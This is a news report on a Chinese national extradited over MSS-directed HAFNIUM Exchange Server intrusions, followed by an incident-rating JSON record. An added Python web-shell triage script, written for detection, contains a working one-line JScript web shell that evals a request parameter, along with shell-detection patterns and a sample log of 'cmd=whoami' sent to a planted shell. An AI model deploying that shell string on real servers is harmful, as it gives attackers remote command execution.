Chinese National Extradited to U.S. in Major Cyber Espionage Case Linked to MSS
A Chinese national, Xu Zewei, was extradited from Italy to the United States to face charges for his alleged role in a large-scale cyber espionage campaign directed by China’s Ministry of State Security (MSS). Xu and co-conspirator Zhang Yu, who remains at large, are accused of breaching thousands of computers worldwide while employed by Shanghai Powerock Network Co. Ltd., a firm prosecutors describe as a front for state-sponsored hacking operations.
The campaign targeted U.S. universities, COVID-19 research organizations, and law firms, with the attackers seeking sensitive data on vaccines, treatments, and testing. Prosecutors also link Xu to the HAFNIUM operation, which in early 2021 exploited vulnerabilities in on-premises Microsoft Exchange Server to take over email systems and move into victim networks. Microsoft disclosed the attacks and shipped out-of-band Exchange patches in March 2021, and U.S. agencies including the FBI and CISA issued emergency guidance; the campaign reportedly affected more than 12,700 U.S. organizations.
According to court documents, Xu and his associates installed web shells on exploited servers, enabling remote access and data exfiltration. Victims included a university in Texas and a global law firm with offices in Washington, D.C. The MSS, including its Shanghai State Security Bureau (SSSB), allegedly directed the hacking, leveraging a network of private contractors to obscure its involvement.
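Triage logic for the web-shell stage described above, added here as an illustration and not taken from the article, the court filings, or Microsoft. It checks the two things a responder looks at first on an Exchange front end: the IIS W3C logs for requests to unexpected .aspx files in the directories where HAFNIUM shells were dropped, and the web root for .aspx files that read a request parameter and hand it to eval or Process.Start. The directory names follow Microsoft's March 2021 HAFNIUM reporting; the baseline file list, the log lines and the sample shell are constructed for the example and are not real artifacts.

```python
"""Web-shell triage for an Exchange front end: IIS log review plus web-root scan.
Added example; the baseline, log lines and sample shell below are constructed."""
import os
import re
import tempfile
from typing import Iterable

# URL prefixes where HAFNIUM web shells were reported dropped
# (owa/auth, ecp/auth, aspnet_client under the Exchange front-end web root).
SUSPECT_DIRS = ("/owa/auth/", "/ecp/auth/", "/aspnet_client/")

# Illustrative baseline of .aspx pages that legitimately live in those
# directories; a real deployment would build this from a known-good install.
KNOWN_BASELINE = {
    "/owa/auth/logon.aspx",
    "/owa/auth/errorfe.aspx",
    "/ecp/auth/timeoutlogout.aspx",
}

# All three must match for a file to be flagged: a server-side script block,
# a request parameter being read, and something that executes it.
SHELL_MARKERS = [
    re.compile(r'runat\s*=\s*"server"', re.I),
    re.compile(r"Request\s*(\[|\.Form|\.Item|\.QueryString)", re.I),
    re.compile(r"\beval\s*\(|Process\.Start|cmd\.exe", re.I),
]

# W3C extended log format with the fields listed in the #Fields header below.
IIS_LINE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<sip>\S+) (?P<method>\S+) (?P<uri>\S+) "
    r"(?P<query>\S+) (?P<port>\d+) (?P<user>\S+) (?P<cip>\S+) (?P<ua>\S+) (?P<status>\d+)"
)

# Constructed sample log: one attacker IP hits two non-baseline .aspx files.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-03-02 08:15:01 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.10 Mozilla/5.0 200
2021-03-02 08:16:44 10.0.0.5 POST /owa/auth/help.aspx - 443 - 198.51.100.77 python-requests/2.25.1 200
2021-03-02 08:17:02 10.0.0.5 POST /aspnet_client/system_web/web.aspx cmd=whoami 443 - 198.51.100.77 python-requests/2.25.1 200
2021-03-02 08:18:30 10.0.0.5 GET /ecp/default.aspx - 443 admin@corp 203.0.113.10 Mozilla/5.0 200
"""

# Constructed file contents: a one-line JScript shell and a benign page.
SAMPLE_SHELL = ('<script language="JScript" runat="server">'
                'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>')
SAMPLE_BENIGN = '<%@ Page Language="C#" %><html><body>Outlook sign-in</body></html>'


def suspicious_requests(log_lines: Iterable[str]) -> list[dict]:
    """Return requests for .aspx files in SUSPECT_DIRS that are not in the baseline."""
    hits = []
    for line in log_lines:
        if line.startswith("#"):          # W3C header lines
            continue
        m = IIS_LINE.match(line)
        if not m:
            continue
        uri = m["uri"].lower()
        if not uri.endswith(".aspx") or uri in KNOWN_BASELINE:
            continue
        if not uri.startswith(SUSPECT_DIRS):
            continue
        hits.append({"time": f"{m['date']} {m['time']}", "method": m["method"],
                     "uri": uri, "client": m["cip"], "status": m["status"]})
    return hits


def scan_webroot(root: str) -> list[str]:
    """Walk root and return .aspx files whose content matches every shell marker."""
    flagged = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".aspx"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    content = fh.read()
            except OSError:
                continue
            if all(marker.search(content) for marker in SHELL_MARKERS):
                flagged.append(path)
    return sorted(flagged)


def demo_scan() -> list[str]:
    """Build a throwaway web root with one benign page and one shell, then scan it."""
    root = tempfile.mkdtemp(prefix="exch_webroot_")
    auth = os.path.join(root, "owa", "auth")
    os.makedirs(auth)
    with open(os.path.join(auth, "logon.aspx"), "w") as fh:
        fh.write(SAMPLE_BENIGN)
    with open(os.path.join(auth, "help.aspx"), "w") as fh:
        fh.write(SAMPLE_SHELL)
    return [os.path.relpath(p, root).replace(os.sep, "/") for p in scan_webroot(root)]


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG.splitlines()):
        print("log hit:", hit)
    for path in demo_scan():
        print("shell on disk:", path)
```

The log check deliberately keys on the path rather than on a status code or user agent: a shell answers 200 like any other page, and the operators in this campaign used ordinary HTTP clients. The on-disk check requires all three markers so that Exchange's own server-side pages, which contain runat="server" but do not evaluate request input, are not flagged.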
Xu faces charges of wire fraud, computer intrusion, and aggravated identity theft, which carry statutory penalties ranging from a mandatory two-year term for aggravated identity theft to a maximum of 20 years per count. U.S. officials stressed that China’s use of third-party contractors for cyber operations has produced indiscriminate targeting: the contractors leave compromised systems exposed to further exploitation and can sell stolen data on to other malicious actors. The case underscores the MSS’s reliance on private companies to carry out state-backed espionage while keeping itself at arm’s length from direct attribution.
Source: https://www.helpnetsecurity.com/2026/04/28/chinese-national-cyber-espionage-charges/
Microsoft Security cybersecurity rating report: https://www.rankiteo.com/company/microsoft-security
{
  "id": "MIC1777386894",
  "linkid": "microsoft-security",
  "type": "Cyber Attack",
  "date": "3/2021",
  "severity": "100",
  "impact": "5",
  "explanation": "Attack threatening the organization's existence"
}
{
  "affected_entities": [
    {
      "industry": "Education",
      "location": "Texas, USA",
      "name": "University in Texas",
      "type": "University"
    },
    {
      "industry": "Legal",
      "location": "Washington, D.C., USA",
      "name": "Global law firm with offices in Washington, D.C.",
      "type": "Law Firm"
    },
    {
      "industry": "Healthcare/Research",
      "location": "USA",
      "name": "COVID-19 research organizations",
      "type": "Research Organization"
    }
  ],
  "attack_vector": "Exploitation of Microsoft Exchange Server vulnerabilities (HAFNIUM)",
  "data_breach": {
    "data_exfiltration": "Yes",
    "personally_identifiable_information": "Yes (aggravated identity theft charges)",
    "sensitivity_of_data": "High (sensitive research, legal, and personal data)",
    "type_of_data_compromised": [
      "COVID-19 research data",
      "Legal information",
      "Email communications"
    ]
  },
  "date_detected": "2021-03",
  "date_publicly_disclosed": "2021-03",
  "description": "A Chinese national, Xu Zewei, was extradited from Italy to the United States to face charges for his alleged role in a large-scale cyber espionage campaign orchestrated by China’s Ministry of State Security (MSS). The campaign targeted U.S. universities, COVID-19 research organizations, and law firms, exploiting vulnerabilities in Microsoft Exchange Server to compromise email systems and infiltrate victim networks.",
  "impact": {
    "data_compromised": "Sensitive data on vaccines, treatments, testing, and legal information",
    "identity_theft_risk": "High (aggravated identity theft charges)",
    "operational_impact": "Compromised email systems, unauthorized remote access",
    "systems_affected": "Email systems, victim networks"
  },
  "initial_access_broker": {
    "backdoors_established": "Web shells",
    "entry_point": "Microsoft Exchange Server vulnerabilities",
    "high_value_targets": [
      "Universities",
      "Law firms",
      "COVID-19 research organizations"
    ]
  },
  "investigation_status": "Ongoing (Xu extradited, Zhang Yu at large)",
  "motivation": "State-sponsored espionage, theft of sensitive data (COVID-19 research, legal information)",
  "post_incident_analysis": {
    "root_causes": "Exploitation of unpatched Microsoft Exchange Server vulnerabilities, state-sponsored cyber espionage"
  },
  "references": [
    {"source": "U.S. Department of Justice"},
    {"source": "Microsoft Security Response Center"}
  ],
  "regulatory_compliance": {
    "legal_actions": "Charges filed (wire fraud, computer intrusion, aggravated identity theft)"
  },
  "response": {
    "containment_measures": "Emergency security updates for Microsoft Exchange Server",
    "law_enforcement_notified": "Yes (FBI, CISA)"
  },
  "threat_actor": [
    "China’s Ministry of State Security (MSS)",
    "Shanghai State Security Bureau (SSSB)",
    "Shanghai Powerock Network Co. Ltd."
  ],
  "title": "Chinese National Extradited to U.S. in Major Cyber Espionage Case Linked to MSS",
  "type": "Cyber Espionage",
  "vulnerability_exploited": "Microsoft Exchange Server vulnerabilities (e.g., ProxyLogon)"
}